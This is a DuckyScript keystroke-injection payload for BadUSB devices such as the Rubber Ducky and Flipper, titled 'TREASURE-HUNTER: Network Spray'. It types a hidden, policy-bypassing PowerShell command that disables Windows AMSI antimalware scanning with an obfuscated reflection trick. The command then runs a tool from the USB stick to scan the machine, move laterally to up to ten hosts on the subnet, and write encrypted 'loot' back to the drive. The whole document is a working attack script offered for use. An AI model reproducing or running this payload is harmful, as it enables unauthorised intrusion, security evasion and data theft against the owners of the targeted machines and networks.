REM ============================================================
REM TREASURE-HUNTER: Network Spray (USB)
REM ============================================================
REM Full triage scan + lateral movement against entire subnet.
REM Takes longer (~30 min) but gets everything.
REM
REM Prerequisites: treasure-hunter.exe on USB root
REM Device: Hak5 Rubber Ducky / O.MG / Flipper BadUSB
REM ============================================================

DELAY 2000
GUI r
DELAY 500
STRING powershell -w hidden -ep bypass -nop -c "$a=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUtils');$f=$a.GetField('am'+'siInitFailed','NonPublic,Static');$f.SetValue($null,$true);$d=(Get-Volume|?{Test-Path \"$($_.DriveLetter):\treasure-hunter.exe\"}).DriveLetter;if($d){& \"$d`:\treasure-hunter.exe\" -p triage --lateral --lateral-max-hosts 10 -o \"$d`:\loot.jsonl\" --encrypt --passphrase 'CHANGE-ME' -q}"
ENTER
